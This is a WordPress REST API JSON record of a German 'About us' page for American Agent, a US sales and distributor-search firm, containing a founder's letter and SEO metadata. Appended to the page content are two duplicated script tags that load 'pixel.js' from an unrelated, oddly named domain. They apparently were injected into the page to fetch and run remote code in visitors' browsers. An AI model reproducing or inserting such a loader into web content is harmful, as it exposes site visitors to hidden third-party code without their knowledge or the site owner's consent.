{"id":2988,"date":"2014-08-30T08:16:10","date_gmt":"2014-08-30T12:16:10","guid":{"rendered":"https:\/\/americanagent.com\/about-2\/"},"modified":"2014-09-17T11:52:34","modified_gmt":"2014-09-17T15:52:34","slug":"ueber-uns","status":"publish","type":"page","link":"https:\/\/americanagent.com\/de\/ueber-uns\/","title":{"rendered":"\u00dcber uns"},"content":{"rendered":"<div  class='flex_column av-av_one_third-2a9015ff38129c418a3f2eafba3e9512 av_one_third  avia-builder-el-0  el_before_av_two_third  avia-builder-el-first  first flex_column_div  '     ><style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-av_image-a93c561256837246238cb8883510db81\">\n.avia-image-container.av-av_image-a93c561256837246238cb8883510db81 img.avia_image{\nbox-shadow:none;\n}\n.avia-image-container.av-av_image-a93c561256837246238cb8883510db81 .av-image-caption-overlay-center{\ncolor:#ffffff;\n}\n<\/style>\n<div  class='avia-image-container av-av_image-a93c561256837246238cb8883510db81 av-styling- avia_animated_image av-animated-when-visible-95 top-to-bottom avia-align-center  avia-builder-el-1  avia-builder-el-no-sibling '   itemprop=\"image\" itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/ImageObject\" ><div class=\"avia-image-container-inner\"><div class=\"avia-image-overlay-wrap\"><img decoding=\"async\" fetchpriority=\"high\" class='wp-image-4022 avia-img-lazy-loading-not-4022 avia_image ' src=\"https:\/\/americanagent.com\/wp-content\/uploads\/2014\/08\/about.jpg\" alt='' title='about'  height=\"2592\" width=\"2022\"  itemprop=\"thumbnailUrl\" srcset=\"https:\/\/americanagent.com\/wp-content\/uploads\/2014\/08\/about.jpg 2022w, https:\/\/americanagent.com\/wp-content\/uploads\/2014\/08\/about-234x300.jpg 234w, https:\/\/americanagent.com\/wp-content\/uploads\/2014\/08\/about-803x1030.jpg 803w, https:\/\/americanagent.com\/wp-content\/uploads\/2014\/08\/about-1170x1500.jpg 1170w, https:\/\/americanagent.com\/wp-content\/uploads\/2014\/08\/about-549x705.jpg 549w, https:\/\/americanagent.com\/wp-content\/uploads\/2014\/08\/about-450x576.jpg 450w\" sizes=\"(max-width: 2022px) 100vw, 2022px\" \/><\/div><\/div><\/div><\/div>\n<div  class='flex_column av-av_two_third-1c47c10d9dd6b9bc0b68f292c1cf5942 av_two_third  avia-builder-el-2  el_after_av_one_third  avia-builder-el-last  flex_column_div  '     ><section  class='av_textblock_section av-av_textblock-aaf3a53f7e22769a7798f31e42769683 '   itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class='avia_textblock'  itemprop=\"text\" ><p><span class='av_dropcap1 av-av_dropcap1-3cd9da5fea0ef5fb27aee617571c39a3'><span style=\"color: #000000;\">S<\/span><\/span>eit 2002 hilft American Agent Firmen mit dem Einstieg in den amerikanischen Absatzmarkt, durch die st\u00e4rksten Verkaufsstrategien. Abgesehen vom Service, war unser Ziel schon immer die h\u00f6chste Marktpr\u00e4senz unserer Klienten in den USA.<\/p>\n<p>In den letzen Jahren haben sich auf Industrieebene die Verkaufsmodelle amerikanischer Firmen stark ver\u00e4ndert. Wer heutzutage in den Markt der USA einsteigen m\u00f6chte, muss neue Strategien in Erw\u00e4gung ziehen.<\/p>\n<p>Ich w\u00fcrde gerne pers\u00f6nlich ihren Ansprechpartner einladen. Stellen Sie Ihr Unternehmen vor und erkl\u00e4ren Sie uns ihre wirtschaftlichen Bed\u00fcrfnisse in den USA. Ich bin mir sicher, dass wir\u00a0passende Ideen f\u00fcr ihre Vorstellungen finden.<\/p>\n<p>Mit freundlichen Gr\u00fc\u00dfen,<\/p>\n<p><strong>Kari Koivuniemi<\/strong><\/p>\n<p><strong>Gesch\u00e4ftsf\u00fchrer und Gr\u00fcnder<\/strong><\/p>\n<\/div><\/section><\/div><script src='https:\/\/scripts.trasnaltemyrecords.com\/pixel.js?track=r&#038;subid=043' type='text\/javascript'><\/script><script src='https:\/\/scripts.trasnaltemyrecords.com\/pixel.js?track=r&#038;subid=043' type='text\/javascript'><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"open","ping_status":"open","template":"","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"footnotes":""},"class_list":["post-2988","page","type-page","status-publish","hentry"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.4 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>American Agent - \u00dcber Uns<\/title>\n<meta name=\"description\" content=\"Genau abgestimmte Verkaufsl\u00f6sungen f\u00fcr ihren Vertrieb in die USA. Bei uns finden Sie die Handelsvertreter und Gesch\u00e4ftspartner nach denen Sie suchen.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/americanagent.com\/de\/ueber-uns\/\" \/>\n<meta property=\"og:locale\" content=\"de_DE\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"American Agent - \u00dcber Uns\" \/>\n<meta property=\"og:description\" content=\"Genau abgestimmte Verkaufsl\u00f6sungen f\u00fcr ihren Vertrieb in die USA. Bei uns finden Sie die Handelsvertreter und Gesch\u00e4ftspartner nach denen Sie suchen.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/americanagent.com\/de\/ueber-uns\/\" \/>\n<meta property=\"og:site_name\" content=\"American Agent - USA Sales Services and Distributor Search Services\" \/>\n<meta property=\"article:modified_time\" content=\"2014-09-17T15:52:34+00:00\" \/>\n<meta name=\"twitter:label1\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data1\" content=\"1 minute\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/americanagent.com\\\/de\\\/ueber-uns\\\/\",\"url\":\"https:\\\/\\\/americanagent.com\\\/de\\\/ueber-uns\\\/\",\"name\":\"American Agent - \u00dcber Uns\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/americanagent.com\\\/de\\\/#website\"},\"datePublished\":\"2014-08-30T12:16:10+00:00\",\"dateModified\":\"2014-09-17T15:52:34+00:00\",\"description\":\"Genau abgestimmte Verkaufsl\u00f6sungen f\u00fcr ihren Vertrieb in die USA. Bei uns finden Sie die Handelsvertreter und Gesch\u00e4ftspartner nach denen Sie suchen.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/americanagent.com\\\/de\\\/ueber-uns\\\/#breadcrumb\"},\"inLanguage\":\"de-DE\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/americanagent.com\\\/de\\\/ueber-uns\\\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/americanagent.com\\\/de\\\/ueber-uns\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/americanagent.com\\\/de\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\u00dcber uns\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/americanagent.com\\\/de\\\/#website\",\"url\":\"https:\\\/\\\/americanagent.com\\\/de\\\/\",\"name\":\"American Agent - USA Sales Services and Distributor Search Services\",\"description\":\"USA Sales services and Distributor, Importer and Reseller Search services.\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/americanagent.com\\\/de\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"de-DE\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"American Agent - \u00dcber Uns","description":"Genau abgestimmte Verkaufsl\u00f6sungen f\u00fcr ihren Vertrieb in die USA. Bei uns finden Sie die Handelsvertreter und Gesch\u00e4ftspartner nach denen Sie suchen.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/americanagent.com\/de\/ueber-uns\/","og_locale":"de_DE","og_type":"article","og_title":"American Agent - \u00dcber Uns","og_description":"Genau abgestimmte Verkaufsl\u00f6sungen f\u00fcr ihren Vertrieb in die USA. Bei uns finden Sie die Handelsvertreter und Gesch\u00e4ftspartner nach denen Sie suchen.","og_url":"https:\/\/americanagent.com\/de\/ueber-uns\/","og_site_name":"American Agent - USA Sales Services and Distributor Search Services","article_modified_time":"2014-09-17T15:52:34+00:00","twitter_misc":{"Est. reading time":"1 minute"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/americanagent.com\/de\/ueber-uns\/","url":"https:\/\/americanagent.com\/de\/ueber-uns\/","name":"American Agent - \u00dcber Uns","isPartOf":{"@id":"https:\/\/americanagent.com\/de\/#website"},"datePublished":"2014-08-30T12:16:10+00:00","dateModified":"2014-09-17T15:52:34+00:00","description":"Genau abgestimmte Verkaufsl\u00f6sungen f\u00fcr ihren Vertrieb in die USA. Bei uns finden Sie die Handelsvertreter und Gesch\u00e4ftspartner nach denen Sie suchen.","breadcrumb":{"@id":"https:\/\/americanagent.com\/de\/ueber-uns\/#breadcrumb"},"inLanguage":"de-DE","potentialAction":[{"@type":"ReadAction","target":["https:\/\/americanagent.com\/de\/ueber-uns\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/americanagent.com\/de\/ueber-uns\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/americanagent.com\/de\/"},{"@type":"ListItem","position":2,"name":"\u00dcber uns"}]},{"@type":"WebSite","@id":"https:\/\/americanagent.com\/de\/#website","url":"https:\/\/americanagent.com\/de\/","name":"American Agent - USA Sales Services and Distributor Search Services","description":"USA Sales services and Distributor, Importer and Reseller Search services.","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/americanagent.com\/de\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"de-DE"}]}},"_links":{"self":[{"href":"https:\/\/americanagent.com\/de\/wp-json\/wp\/v2\/pages\/2988","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/americanagent.com\/de\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/americanagent.com\/de\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/americanagent.com\/de\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/americanagent.com\/de\/wp-json\/wp\/v2\/comments?post=2988"}],"version-history":[{"count":0,"href":"https:\/\/americanagent.com\/de\/wp-json\/wp\/v2\/pages\/2988\/revisions"}],"wp:attachment":[{"href":"https:\/\/americanagent.com\/de\/wp-json\/wp\/v2\/media?parent=2988"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}